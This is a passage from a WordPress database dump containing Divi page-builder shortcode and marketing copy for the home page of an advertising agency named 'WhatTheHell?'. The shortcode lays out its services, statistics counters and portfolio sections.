button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 16:39:36','2020-08-07 16:39:36','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(499,1,'2020-08-07 16:40:32','2020-08-07 16:40:32','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"creative advertising agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" 